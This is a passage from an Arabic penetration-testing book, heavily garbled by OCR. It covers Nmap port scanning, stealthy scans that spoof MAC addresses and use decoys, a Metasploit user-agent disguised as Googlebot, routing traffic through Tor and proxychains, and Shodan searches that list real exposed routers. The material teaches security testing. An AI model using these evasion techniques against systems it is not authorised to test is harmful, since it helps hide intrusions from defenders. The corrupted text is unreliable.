وكشف التطفل. 

لزيادة فعالية البحث والاستطلاع الفعال لتأمين معلومات تفصيلية يجب 
التركيز على السرية من أجل منع الاكتشاف من قبل نظام الحماية. 
اکتشاف البورتات ونظام التشغيل والخدمات: 
كالي يحوي على عدة أدوات مفيدة تستخدم للتعرف على البورتات 
المفتوحة وللتعرف على نظام التشغيل والخدمات المنصبة على الأجهزة 
البعيدة ومعظم هذه المهام يمكن أن تتم باستخدام ممص 


اختبار اختراق سيرفرات وتطبيقات الويب 


فحص البورتات: 
هذه العملية تقوم بفحص بورتات الاتصال ءاorم CP and UDP‏ اتحدید 


الخدمات والتطبيقات التي تعمل على الجهاز الهدف. 


البورتات في جهاز الكمبيوتر هي مثل الأبواب التي تسمح لك بالدخول 
للمنزل ولكل خدمة معينة بورت خاصة بها مثلا: 
HT traffic‏ پستخدم البورت 80 


443 يستخدم البورت‎ HTTPS traffic 


لذلك إذا وجدنا ان البورتات 443 كه 80 مفتوحة هذا يعني أن 1۲۲۲۴ 
and HL PS‏ تعمل علی الجھاز 

يوجد كأامoم‏ 65,535 بعض هذه البورتات معروفة ومخصصة لخدمات 
port 20 and 21 for FTP (file transfer protocol)‏ 

أول 1,024 ءاام هي بورتات معروفة ومعظمها مخصصة لخدمات 


di 


اختبار اختراق سيرفرات وتطبيقات الويب 


الهدف من عملية فحص البورتات هي الإجابة على ثلاثة اسئلة متعلقة 
بسيرفر الويب: 

-١‏ ماهي البورتات المفتوحة. 

"- ماهي الخدمات التي تعمل على هذه البورتات. 

۳- ماهي إصدارات الخدمات التي تعمل. 
إذا حصلنا على إجابات صحيحة لهذه الأسئلة فإننا نكون قد تقدمنا 
خطوة في عملية الهجوم. 
البورت 80 يستخدم من أجل خدمة الويب ولكن هذه الخدمة يمكن أن 
يتم توجيهها باستخدام أي بورت أخر, هذه الخاصية تستخدم من أجل 
إخفاء خدمات معينة عن عيون المهاجمين ولكن إذا قام المهاجم بإجراء 
عملية فحص شاملة للبورتات فيمكنه كشف هذه الخدمات. 


:Nmap 

الأداة الأكثر شهرة للقيام بعملية فحص المنافذ و٣‏ 2ءs‏ ۴مم هي 
Nmap‏ وهي موجودة تلقائياً في نظام کالي 

هناك العديد من أنواع الفحص التي تستطيع هذه الأداة القيام بها, 
حالياً نحن نعرف عنوان ه٣‏ ههه ۱۴ لسيرفر الويب وبالتالي نستطيع 


اختبار اختراق سيرفرات وتطبيقات الويب 


تشغيل م2٣"‏ على سيرفر الويب 0۷W۸4‏ الخاص بنا والذي له العنوان 
المحلي 127.0.0.1 
قم با ۴ E‏ ا . التالية: 


Nmap -sV -O -p- 127.0.0.1 


۷ء-: لتحديد الاإصدار ١های٣م۷‏ الخاص بالخدمات المكتشفة. 

١‏ 0 -: تعطي معلومات متعلقة بنظام التشغيل كنوع النظام و 
إصدارہ. 

٠‏ -م- : للقيام بعملية فحص لكل البورتات. 

127..1: عنوان address‏ ۶| للهدف. 


نتيجة هذه التعليمة هي التالي: 


:~# nmap -sV -0 -p- 127.0.0.1 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-04 02:24 EST 
Nmap scan report for localhost (127.0.0.1) 
Host is up (0.000011s latency) . 
Not shown: 65530 closed ports 
STATE SERVICE VERSION 
open http Apache httpd 2.4.10 ( (Debian) }) 
open ssl/http VMware VirtualCenter Web service 
open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP) 
open mysql MySQL 5.5.46-0+deb8u1 
open http VMware hostd httpd 
e: general purpose 
Running: Linux 3.X 
OS CPE: cpe:/o:linux:linux_kernel :3 
OS details: LinüUx 3.7 - 3.18 
Network Distance: O0 hops 


OS and Service detection performed. Please report any incorrect results at https:// 
/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 23.23 seconds 
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من هذه النتيجة نلاحظ أن هناك خمس خدمات تعمل على سيرفر الويب 
(النتيجة يمكن أن تختلف قليلاً بحسب الخدمات التي تعمل على ۷۸۷ 
الخاص بك). 

معرفة الخدمات التي تعمل هو جزء كبير من عملية جمع المعلومات 
والخطوة التالية هي البحث عن الثغرات للقيام باستفلالها. 

هناك نقاط إضافية مثل نسخة النواة وتفاصيل نظام التشغيل وعدد 
القفزات (واحد لأن عملية البحث تمت في جهاز محلي) 


تنبیه: تشغیل م2". ضد جهاز محلي tیه۸اه٥ها‏ يمکن آن يعطي نتائج 
دة و فف 


:Nmap Scripting Engine (NSE) 

إحدى طرق استخدام مة"٣.‏ هي الطريقة التي تتضمن سكريبتات 
tمااءء‏ لقيادة عملية بحث مخصصة, من خلال طلب سكريبت تؤمن 
معلومات معينة عن الهدف المطلوب. 

Nmap Scripting Engine (NSE)‏ تقوم بهذه المهمة 

ولحسن الحظ هناك العديد من كأمااsc‏ cificممs-web‏ الجاھزة 


للاستخدام. 
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هناك حوالي 400 ءأمناء؟ Nmap‏ لذلك يجب عليك أن تتأآکد من 
استخدام السكريبت المفيدة لك, يمكنك رؤيیة کل ءاماا‌ء N5۴‏ الحالية 
والمستندات المتعلقة بھا على /http:/ınmap.org/nsedoc tagal|‏ 

يمكنك استدعاء السكريبت من خلال إضافة 

Nmap iةoيlei إلى نص‎ scripمt=>--script‎ name > 

ناتج عملية فحص البورتات التي تقوم بها مة". يمكن أن تربط بشكل 
مباشر مع العملية التالية التي wiwڌخpa‏ ڊla Nessus and Nikto‏ 


للبحث عن التغرات في سيرفر الويب. 
استراتيجيات البحث السرى: 


أكبر مخاطر الاستصلاع الفعال هو أن يقوم الهدف باكتشاف هذه 
العملية. 


باستخدام وقت الاختبار و ئمصهاء data‏ وعنوان ۱P source‏ وبعض 
المعلومات الإضافية يستطيع الهدف التعرف على مصدر الهجوم, لذلك 
الهدف. 
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عند تطبيق السرية لدعم عملية الاستطلاع الفعال فإن مختبر الاختراق 
يقوم بالأمور التالية: 
« استخدام أدوات التمويه من أجل تجنب الاكتشاف وتشغيل أجهزة 
الانذار. 
١‏ إخفاء بيانات الهجوم داخل البيانات الشرعية. 
٠‏ تعديل الهجوم لإخفاء مصدر ونوع البيانات. 
١‏ جعل الهجوم غير مرئي باستخدام أنواع بيانات غير معيارية أو 
باستخدام التشغفير. 


تقنيات البحث السري يمكن أن تحوي على بعض أو كل الأمور التالية: 
* تعيير lgicنj‏ °| source‏ 
تغیر بارامترات حزم البیانات باستخدام مہہ 
٭ استخدام بروکسي لشبکات مغخûية (Tor network)‏ 
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تغير عنوان ۱۴ ۴٤١١‏ نامء وتعديل الأدوات: 

قبل القيام بعملية اختبار الاختراق أو الهجوم يجب التأكد من إيقاف كل 
الخدمات الغير ضرورية التي تعمل في كالي لينكس. 

مثلً: إذا كان 01٥۴‏ امعها فعال وغير مطلوب فمن الممكن أن يقوم 
H۴‏ بالتفاعل مع النظام الهدف وهذا التفاعل يمكن أن يتم تسجيله 
في سجلات النظام الهدف. 

معظم مختبري الاختراق يقومون بالتأكد من أن كل البيانات تنتقل عبر 
IPv4 socks proxy‏ 

بعض الأدوات التجارية أو المفتوحة المصدر (مثل اoiاMetasp‏ 
)۴ramework‏ تقوم بإضافة حزمها في سلسة التعریف رغم أنه يمکن 
أن يكون مفيد في مرحلة بعد الاختبار لتحليل حالة سجلات النظام 
الهدف لمعرفة إذا تم تسجيل الأفعال التي قام بها مختبر الاختراق أو 
المهاجم داخل سجلات النظام الهدف, هذه الإضافات يمكن أن تثير 


يجب فحص الداة المستخدمة في اختبار الاختراق لتحديد حزم البيانات 
التي تضيفها هذه الأداة. 
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أسهل طريقة لتعريف الإضافات هي استخدام الأداة ضد نسخة تخيلية 
حديثة عن الموقع الهدف ورؤية سجلات النظام إذا احتوت على اسم 
الأداة أو لا. 

بالاضافة إلى استخدام محلل البيانات k٣ماsمrاwi‏ لإلتقاط البيانات بين 
مختبر الاختراق أو المهاجم و الصورة التخيلية virtual mace‏ لانظام 
الهدف ثم البحث في مûlتlٽت jc packet capture (pcap)‏ أ کلمات 
يمكن أن تنسب إلى الأداة المستخدمة في اختبار الاختراق (مثل اسم 
الأداة أو الفصنع أو رقم الرخصة أو أمور أخرى) 

ayمكj User Agent in the Metasploit Framework jti‏ من خلال 
تعدیل نخيlر http_form_field‏ 


باستخدام الأمر كما في الشكل التالي: 


msf > use auxiliary/fuzzers/http/http_form_field 
msf auxiliary ( J) > set useragent Googlebot/2.1 (+http://www.google.com/bot .htmlL 


useragent => Googlebot/2.1 (+http://www.google.com/bot .html 


في هذا المثال قمنا بضبط ٤٣مو۲۸ءءل‏ ليأخذ قيمة 
Googel's indexing spider Googelbot‏ 


هو تطبيق اتوماتيكي شائع يقوم بزيارة وفهرست المواقع ونادراً ها 
يلفت انتباه مالك الموقع. 
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تعديل بارامترات حزم البيانات: 


الاستطلاع الفعال يتم من خلال إرسال بيانات تعريف إلى الهدف ثم 
استخدام حزم البيانات المعادة للحصول على المعلومات 

أشهر أداة مستخدمة لهذا الهدف هي Network Mapper (¬map)‏ 
لاستخدام مدص١‏ بفاعلية من الضروري العمل بصلاحيات الروت 
privileges‏ اeveا-tدا‏ وكالي يعمل بهذه الصلاحية بشكل تلقائي. 


هذا النوع من التطبيقات يقوم بتلاعب بحزم البيانات لمحاولة التقليل من 
احتمال الاكتشاف و يتم استخدام بعض تقنيات التسلل کالتالي: 


١‏ تعريف هدف البحث قبل البدء بعملية الاختبار وارسال أقل عدد من 
الحزمء مثلاً إذا أردت التأكد من وجود أو حضور جهاز الويب أولاً نت 
بحاجة لتحديد فيما إذا كان 80 ٣مم‏ مفتوح (هذا البورت هو البورت 
الافتراضي لخدمات الويب الأساسية) 

٠‏ تجنب البحث الذي يتم من خلال الاتصال مع نظام الهدف, لا تقم 
بعملية وہام على الهدف و Jا‏ تüwتiخدم Jı synchronize (SYN)‏ 


acknowledge قم باستخدام طرق فحص غير اعتيادية مثل حزم‎ 
(ACK), finished (FIN), and reset (RST) 
قم باختيار عناوين عشوائية أو حاکي عناوين‎ ١ 
Source IP, port address, and MAC address 
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عدل التوقيت للتقليل من فترة وصول حزم البيانات لموقع الهدف. 
١‏ غير حجم حزم البيانات من خلال تقسيم الحزم أو من خلال تقديم 
بيانات عشوائية للتشويش على أجهزة فحص الحزم. 


ولا للقيام | ارت ر ک| e‏ 1 اتقيإ احتمال الاک "0 اف إ 5 
استخدام الاتعليمة التالية 

nmap --spoof-mac- Cisco --data-length 24 -T paranoid --max - 
hostgroup 1 - max-parallelism 10 -PN -f-D 10.1.20.5,RND:5,ME 


--V-n" SS -sV-oA /desktop/penteslnmap/out —-p 7:1-1024 — 
random-hosts 10.1.1.110 10.1.1.15 


الجدول التالي يشرح التعليمة السابقة: 


محاکات عنوان «۸٥€‏ پشابه عنوان 
لمنتج من شركة سيسكو, استبدال 


spoof-mac-Cisco-- 


cio‏ بالرقم0 سوف یقوم بخلق 
عنوان ماك عشوائي 
data-length 24--‏ إضافة 24 كعارط لمعظم حزم 
البيانات المرساة 
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ا 


max-hostgroup--‏ لتحديد الأجهزة التى سوف يتم 


max-parallelism--‏ لتحديد عدد الطلبات المعلقة التى 


لكي لا يقوم بعملية وہام 


الوقت مع لإخفاء الفحص الذي 
يقوم به مختبر الاختراق 


القيام بعملية فحص ۲٥۲ S۷۸‏ 


سرية أو بشكل متسلل والتي لا 
iتتpg‏ ڊ|كJlo TCP handshake‏ 


V- 
اصدار النتائج بكل الصيغ‎ oA Idesktop/pentest/nmap- 
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p T:1-1024-‏ تحدید البورتات ال ا يقوم 


بفحصفا 


random-hosts--‏ فحص أجهزة الهدف بترتيب 


“0 | ٿي 


استخدام هذه الخيارات مع بعضها سوف يقوم بخلق عملية فحص بطيئة 
ومخفية وسرية جداً ولكن في بعض الحالات إذا كانت حزم البيانات غريبة 
أو قد تم تعديلها فإن ذلك يثير انتباه نظام الهدف لذلك فإن العديد 
من مختبري الاختراق يستخدمون شبكات مخفية للتقليل من احتمالية 
الاكتشاف. 


استخدام بروكسى مع شبكة مخفية 


:(tor and proxy) 

www.torproject.org 
تور هو أداة مفتوحة المصدر تسمح بتأمين اتصال مجاني إلى شبكة‎ 
بروكسي مخفية عن طريق إنشاء مسارات متعددة وتغليف حزم البيانات‎ 
بعدة طبقات كالبصلة (لذلك تم اختيار البصلة لتكون ايقونة لهذه الأداة)‎ 
وتشفيرها ثم ارسالها عبر عدد معين من الراوترات وفي كل راوتر يتم‎ 
إزالة طبقة من التشفير للحصول على معلومات التوجيه ويتم ارسال‎ 
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الرسالة إلى العقدة التالية ويتم تنفيذ نفس العملية السابقة (تقشير 
البصلة) إلى حين الوصول إلى الهدف. 
هذه العملية تحمي البيانات من هجوم تحليل البيانات من خلال حماية 


وإخفاء عناوين المصدر والهدف. 


tor with Proxy plخiwl‎ pتس في المثال التالي‎ 


تنصيب تور يتم بالخطوات التالية: 


.١‏ القيام بعملية تحديث والترقية ثم تنصيب تور باستخدام الأوامر 
التالية 


apt-get update 
apt-get upgrade 
apt-get install tor 


1. بعد تنصیب تور قم بتعديJ‏ |لفٹd letc/proxychains.conf‏ 


هذا الملف يعطي أرقام وترتيبات عناوين البروكسي التي سوف 
O DM‏ 

سيرفرات البروكسي يمكن أن تحوي على حمل بيانات كبير نتيجة وهذا 
يسبب بطئ الاتصال أو يمكن أن يكون أحد سيرفرات البروكسي خارج 
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العمل لذلك قم بمنعٍ dynamic_chains Jيعتتüڊ pûg strict_chains‏ 
للتأكيد من أن الاتصال سوف يبقى موجه دون أي انقطاع. 


1# proxychains.conf VER 3.1 

2# 

3# HTTP, SOCKS4, SOCKSS tunneling proxifier with DNS. 

۳ 

6 # The option below identifies how the ProxyList is treated. 
7# only one option should be uncommented at time, 

8# otherwise the last appearing option will be accepted 

QO # 

10 dynamic_chain 

i# 

12# Dynamic - Each connection will be done via chained proxies 
13# all proxies chained in the order as they appear in the list 
14# at least one proxy must be online to play in chain 

15# (dead proxies are skipped) 

16# otherwise EINTR is returned to the app 

17# 

18 #strict_chain 

19# 

20# Strict - Each connection will be done via chained proxies 
21# all proxies chained in the order as they appear in the list 
22# all proxies must be online to play in chain 

23# otherwise EINTR is returned to the app 


socks5 م٣ه×ر قم بتعدیل [tءiاy×٥آ۴] لتاکد من وجود‎ .٣ 


60 [ProxyList ] 

61# add proxy here ... 
62# meanwi le 

63# defaults set to "tor" 
64 socks4 127.0.0.1 9050 
65 socks5 127.0.0.1 9050 
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عناوين البروكسي يمكن الحصول عليها بشكل مجاني من الانترنت 
ویتم إضافتھا إلى proxychains dl‏ 

مختبر الاختراق ١‏ يمكن أن يستغل هذه الميزة ليمنع اكتشافه من 
قبل الهدف. 


؛. لتشغيل خدمة تور من التيرمينال, استخدم الأمر التالي: 


:~# service tor start 


*. للتأكد من أن تور يعمل استخدم التعليمة التالية: 


:~# service tor status 
tor.service - LSB: Starts The Onion Router daemon processes 
Loaded: loaded (/etc/init.d/tor) 
Active: 1 I since Mon 2016-01-04 02:48:43 EST; 19s ago 


Process: 5268 ExecStart=/etc/init .d/tor start (code=exited, status=0/SUCCESS) 
CGroup: /system.slice/tor.service 
l_5280 /usr/bin/tor --defaults-torrc /usr/share/tor/tor-service-de. 


Jan 04 02:48:43 h2o tor[5268] : Starting tor daemon. ..done. 


.١‏ من الضروري التأكد أن شبكة تور تعمل وتؤمن اتصال مخفي 
قم بالتحقق من عنوان ۱۴ الخاص بك من خلال استخدام التعليمة 
التالية: 


iceweasel www. whatismyip.com 
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هذه التعليمة سوف تقوم بفتح المتصفح وفتح الموقع المشار إليه 
الذي يقوم بعرض عنوان ١۴‏ للجهاز المتصل بصفحة الويب. 


يمكن التأكد من أن تور يعمل بشكل صحيح من خلال الدخول إلى الموقع 


https://check.torproject.org 
رغم أن الاتصال محمي الآن باستخدام شبكة تور ولكن من الممكن أن‎ 
۸ه#ا هذا الخلل يحدث عندما يقوم النظام الخاص بك‎ NS يكون هناك‎ 
لتأمين تعريف هويتك لمزود خدمة الانترنت‎ NS مهوuمsا بخلق طلب‎ 
الخاص بك.‎ 


یمکن فحص هذا الخلل من خلاJ‏ gal|lتژ2 www.dnsleaktest.com‏ 

proxychains pڌiiwl‎ عفلll فإن كالي‎ 0۸S عندما تقوم بفحص مهما‎ 
source IP of Level 3 Communication jlgic رlaۈظضlڊ سوف رد‎ 

للسيرفر الموجود في الولايات المتحدة (في هذا المتال) طبعاً هذا 
يؤمن حماية إضافية لمختبر الاختراق ليخفي هويته الحقيقية. 
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Your DNS test results 


This page shows the DNS servers that your computer is using to resolve DNS names. The owners ofthe servers listed below have the ability to 
log the names of all ites y 


f all websitı S YOU Cı nnect to. 


WARNING: If you are connected to a VPN service and ANY of the servers listed below are not provided by the VPN service then your DNS may be 
leaking. (You should be able to recognise them based on the hostname, ISP and location). This is not an issue if you trust the owners of these 
servers with your private data. 


We detected the 2 DNS servers listed below. 


IP: 192.222.144.12 
Hostname: 192.222.144.12 

ISP: Level 3 Communications 
Cain United States E 
7ا‎ 142 .22.144.19 
Hostname: 192.22.144.109 

ISP: Level 3 Communications 


County: 


United States 


عند استخدام تور يجب أن تأخذ الأمور التالية بعين الاعتبار: 


* تور يؤمن خدمة التخفي ولكنه لا يضمن الخصوصية 
مالك العقدة النهائية (عقدة الخروج) قادر على إلتقاط البيانات 
sniff traffic‏ وحسب ما تقول الاشاعات فإنه قادر على الوصول إلى 
شهادات الاعتماد الخاصة بك. 

“ الثفرات في متصفح تور كما تقول الشائعات يمكن أن تستخدم من 
قبل المنظمات القانونية لاستغلال النظام والحصول على معلومات 
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UDP traffic 2o Joleill gıhiwy ll ProxyChains " 

١‏ بعض التطبيقات والخدمات غير قادرة على العمل في هذه البيئة 
وخاصةت Metasploit and nmap‏ يمکن أن یتوقفا عن العمل. 
عملية الفحص السري أو المتسلل باستخدام 8۷۸ بأداة مaصہ‏ 
تندفع في ك٣‏ iةاءر×ه١۴٣م‏ ويتم استدعاء فحص الاتصال بدل ذلك 
وهذا يمكن أن يسبب تسرب المعلومات للهدف. 

١‏ تأكد من مسح ومنع الكوكيز قبل القيام بعملية التصفح. 

السكريبت اما٣عs‏ Buddy-rهt‏ يسمح لك بالتحكم بعدد مرات تحديث 

عنوان ۱۴ بشكل اتوماتيكي وهذا يزيد من صعوبة عملية التعرف 


يمكنك التعرف على هذا السكريبت وطريقة استخدامه من خلال 
الموقع التالى: 


http://sourceforge.net/projects/linuxscripts/files/Tor-Buddy 
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تعریف الرنة |1 o 1I iı‏ بكة: 


مختبر الاختراق يستخدم المعلومات التي حصل عليها بالخطوات السابقة 
من أجل القيام بالتالي: 


١‏ التعرف على الأجهزة التي يمكن أن تكون تسبب التشويش أو 
الشك في نتيجة الفحص (مثل الجدران النارية أو أجهزة فحص 
البيانات) 

١‏ التعرف على الأجهزة التي تحوي على ثغرات. 

٠‏ التعرف على المعدات للاستمرار في عملية البحث السري أو البحث 
الفشطال 

٠‏ الحصول على فهم شامل لبنية نظام الحماية الخاص بالهدف. 

الأداة trace oute‏ تؤمن معلومات أساسية عن المقدرة على فلترة حزم 


البيانات بالإضافة إلى بعض الأدوات الأخرى وهى: 


تكشف الأجهزة وتحدد نظام 


التشفيل ونسة: 


محرك بحث يقوم بتحديد نوع 
الأجهزة المتصلة بشبكة الانترنت 
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:Shoden 


يعتبر من أقوى محركات البحث التي يستخدمها الهاكرز ويسمى 
"Hacker's Google" , "Dark Google" and terrifying"‏ 


وهو يسمح بإيجاد الأجهزة عبر الويب من خلال البحث عن نظام التشغيل 


مثلةً يمكن البحث عن كل الأجهزة التي تعمل بنظام 7.0 Microsoft ||S‏ 
Servers‏ في کندا أو كل الأجهزة التي تعمل بنظام ×امذا في 
افريقيا. 


إِذا کنت على معرفة مwږãة‏ ڊ ga Shoden jli "Google Dorks"‏ 
استخدام S٥١٥١‏ بفعالية يتم من خلال معرفة كلمات البحث الصحيحة 


وعادتاً هي اسم الشركة القُصنعة أو رقم موديل الجهاز. 
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عند معرفة الكلمات المفتاحية التي يجب استخدامها في عملية البحث 
يمكنك البحث عن كل هذه الأجهزة بثواني ويمكنك استخدام تعليمات 
الفلترة من أجل تحديد الأجهزة المطلوبة أو المنطقة المطلوبة. 

وهو يسمح لمهندسي الحماية بتحديد الأجهزة المخادعة أو الأجهزة 
الغير مسموح لها والتي تم إضافتها إلى الشبكة. 

سوف نقوم بشرح عملية فحص الشبكة ڊlسwتخدlم Shoden‏ 

لماذا يجب عليك فحص سشبکكتك باستخدام ٣deهSh:‏ 


Shonden‏ يمكنه كشف أجهزة الحماية والراوترات وأنظمة الهاتف 
وكميرات المراقبة وأ نظمة التحكم ومعظم أجهزة الشبكات الأخرى. 
العديد من أنطمة التحكم وأنظمة المراقبة في الشركات يتم الوصول 
لها من خلال المعلومات الافتراضية (اسم المستخدم وكلمة السر 
الافتراضية) 

العديد من كلمات البحث المفتاحية يتم مشاركتها بين العامة عبر 
الانترنت. 

من المهم جداً لمدير الشبكة أن يقوم بعملية الفحص باستخدام 
Shoden‏ لرؤية فيما إذا كانت أجهزة الشبكة الخاصة به يمكن الوصول 


إليها من قبل العامة عبر الانترنت. 
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:Shoden Website 


@ shodan x 


CGC f Ê hıttps://www.shodan.io‏ ج 


The search engine for 
Shodan is the world's first search engine for Intern 


Create a Free Account Getting Started 


Explore the Internet of Things 
Use Shodan to discover which of your devices are connected to the Internet, where 


they are located and who is using them 


Monitor Network Security Get a Competitive Advantage 
Keep track of all the computers on your network that are directly accessible from Who is using your product? Where are they locé 


the Internet. Shodan lets you understand your digital footprint empirical market intelligence 


سنقوم بالبحث عن راوترات سیسکو من خلاJ‏ liSڊة "Cisco router"‏ 
Explore JJ h2rillg‏ 
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Exploits ê Maps 
48.0.2.92 


Claro Dominican Republic Cisco ADSL Router 


Login: 
$‘ Dominican Republic, Santo Domingo et 


Details 


148.101.106.67 


Dominican Republic 7,593 Cisco ADSL Router 
1 Claro Dominican Republic 
United States 2,827 Login: 
Chile 2,91 2‘ Dominican Republic, Santo Domingo 
China 1,811 Details 
Saudi Arabia 1,660 
TOP SERVI 50.207.1994.129 
Comcast Cable 

Telnet 3,94 Cisco Configuration Profess 
PPTP 454 HE United States This feature requires the ¢ 
SNMP 68 Details password "cisco". These det 
Automated Tank Gauge 19 
Telnet (2323) 18 

ANI INS host217-43-39-114.range217-43.btcentralplus.com 000 _---- 

Ci R d < ۱‏ ا 
Claro Dominican Republic 7,585 19c0 Router and Security‏ 
Telefonica Empresas 1737 SÉ United Kingdom, Tunbridge Wells This feature requires the c‏ 
Details with the password "cisco".‏ 

SaudiNet 1,097 
Telecom Argentina S.A. 898 
TATA Cnammuınirafinne Aa7 


يمكنك الضغط على ا عنوان ۱۴ ليتم توجيهك إلى الجهاز المطلوب 
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مثلاً: للبحث عن أجهزة ٣۴ Link‏ في سوریا 


tp link country:sy Qa 


Showing results 1 - 3 of 3 
Login Incorrect 
HTTP/1.1 401 Unauthor ized 


Syrian Telecom أ‎ 
Content-Type: text/html; charset=utf-8 


< Syrian Arab Republic WWW-Authenticate: Basic realm="TP-LINK 300Mbps 
Details Content-Length: 1667 


Connection: close 


Login Incorrect 


HTTP/1.1 401 Unauthor ized 


INET Internet Service Provider ٍ 5 
Content-Type: text/html; charset=utf-8 


= Syrian Arab Republic WW-Authenticate: Basic realm="TP-LINK 300Mbps 
Details Content-Length: 1647 


Connection: close 


Login Incorrect 


HTTP/1.1 491 Unauthor ized 


Syrian Telecom 8 
Content-Type: text/html; charset=utf-8 


< Syrian Arab Republic WWW-Authenticate: Basic realm="TP-LINK 300Mbps 
Details Content-Length: 1647 


Connection: close 
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للبحث عن الأجهزة التي تعمل بنضام التشغيل ٠۷٣٠ء |١١‏ في سوريا 


% Sonn : 


Document Moved 


HTTP/1.1 302 Redirect 


Syrian Telecom 1 
Content-Length: 153 


î Syrian Arab Republic Content-Type: text/html 
Details Location: http: //188.160.5.198/exchange/ 


Server: Microsoft-I11S/6.0 
MicrosoftOfFf iceWebServer: 5. 0_Pub 
X-Powered-By: ASP . NET 


Date: Wed, 906 Jan 2016 14:29:50 GMT 


403 - Forbidden: Access is denied. 
HTTP/1.1 403 Forbidden 


Syrian Telecom 
Content-Type: text/html 


= Syrian Arab Republic Server: Microsoft-I1S/7.5 
Details X-Powered-By: ASP.NET 


Date: Wed, 9۵6 Jan 2016 14:11:15 GMT 


Content-Length: 1233 


IS7 


Windows 7 or 8 
Syrian Computer Society, scs 


HTTP/1.1 200 OK 

Content-Type: text/html 

Last-Modified: Tue, 12 Apr 2011 07:51:34 GMT 
î Syrian Arab Republic Accept-Ranges: bytes 

Details 


ETag: "9c30a371e6f8cb1 : 0" 
Server: Microsoft-11S/7.0 
X-Powered-By: ASP .NET 


كما يمكنك البحث عن موقع معين لمعرفة بعض المعلومات الأساسية 
ومعلومات عن البورتات المفتوحة 
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تعداد اlلÎذجjaةö :Enumeration‏ 
هي عملية لجمع معلومات معينة متعلقة بالنظام الهدف. 


معرفة وجود السيرفر أو الأكسس بوينت هو أمر غير كافي, نحن بحاجة 
لتوسيع سطح الهجوم من خلال تعريف البورتات المفتوحة ونظام 
التشغيل والخدمات التي تعمل والتطبيقات المدعومة. 


اک اف الأجهزة ١١‏ 0 1 

أول خطوة هي تنفيذ تعليمة وام ضد مجال عنوان الهدف والنظر 
لاجابة العائدة والتي تدل على الأجهزة المتصاة في الشبكة الهدف. 
عملية وہام تتم من خلال استخدام 

ICMP (Internet Control Message Protocol) 

ولكکن يمكکن أيضاً üwlخpl CP, JDP, | CMP, and ARP traffic‏ للقيام 
بعملية اكتشاف الأجهزة المتصاة. 


رغم أن أداة البحث الأولية هي مه٣"‏ ولكن كالي يحوي على عدة 


أدوات مفيدة أخرى وهي: 
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الأداة 


dnmap and nmap‏ مapصہ‏ هو اداة تعداد معیاریة 


مapصdnm‏ هی آداة موسعة عن 


مaصہ‏ تستخدم في البيئات الموزعة 


اا0 لق درم ند فن ادل 
fping, hping2, hping3, and‏ 
nping‏ ال عا ا ف هه 
المتصلة في النظام الهدف 


بالنسبة لمختبر الاختراق, البيانات الفعادة تكشف الأجهزة المتصلة وهذا 
يستخدم من أجل التعرف على الهدف قبل الهجوم. 

:Maltego 

أداة مفتوحة المصدر موجودة بشكل تلقائي في نظام كالي 

هذه الأداة تستخدم بجمع المعلومات وتعداد واكتشاف الأجهزة 
المتصلة واكتشاف عناوين الايميل ومجموعات التواصل الاجتماعي 
وأرقام الهواتف في حال وجدت. 


من أجل استخدام هذه الأداة قم بكتابة هواه" في التيرمينل أو 
بإمكانك الوصول لهذه الأداة من قائمة أدوات كالي. 
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عندما تقو 


م بفتح هذه الأداة لأول مرة يجب عليك التسجيل وإجراء عملية 


التحقق عبر الايميل وبعد الانتهاء من التسجيل والتحقق سوف تظهر 


الواجهة الرسومية كما في الشكل التالى: 


1, Zoomto j) 3oemn 
TT, Loon te Fi Zoom Ou 
f Zoom ION Zoom Selecon 


A Selectby Te: 
XK Select Neighbora f Add Neighbors ê Select Unks 
Ja Add Parents # Selett Booimarked " FT? Tievorse L 


nis 


J, Sele Parents 


O O O r Gon 


Entity List 


¢ Detail View 


google.com‏ ر 


1 
ان‎ . Relationships 
ulqoit 


ns4.gqoogle.com 


کل 


n42.900l6:com 


31,906. tom 


E O) 


FE Ptoporty Vow 
¢ Properdes 
pe 

Domain Name 
WHOIS Info 

© Dynamic properties 
Attachments 
j 9 Graph info 


Weigh 


returned Vath O entities 


1 entıt1es 
returned vith 4 entities 
done 


[none server) on 
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` Sele A, Add Similar Sibings. A, Select Children; 4%, Add. Childeen 
% vet Selecbon. û Add all 


Selacien $ Select None 


nane server 


Quick Eriity 


Fiid 


1 Bubble View 


4 Î Output « Transform Output 


Transform To DNS Hone {At 


Tfransfora To ONS Naê (Atta 
funning tronsfora To 
Transfore To ONS None + 
Trongforn To DNS Nome 


CT aarmtetrar Raco 


۲ 
CI 
Paste Clear 

All 


4 ا‎ 
O Delete 


[BS] Palette 
Q Devices 


Device 
aa 0 
leva curh ac a phan e) 


© Infrastructure 
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pg, DNS Name 
ح0‎ Harn 


A IPv1 Address 


An IF ver sun 1 add 


g, MX Record 

n 
NS Record 

ù A DIS nase ser var rucor 


4 Netblock 


> URL 


ت 
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AN let et net UNlue mı Resul 


Website‏ ,۾ 


An eter met weh 
©0 Locations | 
Location 


© Penetralion Testing 


محتوى هذا الفصل: 


Nessus " 
NiktOo " 
Metasploit =" 


٠‏ المحافطة على الوصول وتثبيت الاستغلال. 


Hacking is Not a Crime, it’s an Art of Logic 
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مقدمة: 


البحث عن الثغرات هي عملية كشف الضعف في الخدمات التي تعمل 
من أجل القيام باستغلال هذه الثغرة أو هذا الضعف 

عندما تعرف تفاصيل عن سيرفر الويب الهدف مثل عنوان gq ۱P address‏ 
البورتات المفتوحة والخدمات التي تعمل ونسخة أو إصدار هذه الخدمات 


تستطيع بعدها فحص هذه الخدمات للبحث عن تغرات, وهذه هي 
الخطوة الأخيرة قبل البدء بعملية الاستغلال. 


:Nessus 


سوف نستخدم وںءءه. الباحث عن الثغرات الأكثر شعبية, لكي نكمل 
مرحلة البحث عن التغرات. 


الشخص الذي يستخدم باحث عن الثغرات سيكون دائماً متأخر بخطوة لأنه 
يجب عليه دائماً أن ينتظر فُصنع هذا الباحث ليقوم بكتابة الإضافة التي 
ستقوم بكشف الثغرات الجديدة قبل أن تتم عملية ترقيع ءام هذه 
التغرات 
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من الشائع أن تقرأاً عن استغلال جديد وبعد ساعات قليلة يقوم Nessus‏ 
بإضافته ونشره لتقوم بفحص هذه التغرة. 

jlû free HomeFeed edition of Nessus ةخwi عندما تنستخدم‎ 

الإاضافات ١ا-وںام‏ للثغرات الجديدة سوف تنشر بعد 7 أيام 

ProfessionalFeed edition ةخwi lo‏ for-yمم‏ فهي للبحث عن معظم 
التغرات الحديثة 


تنصطیب sںNessu:‏ 


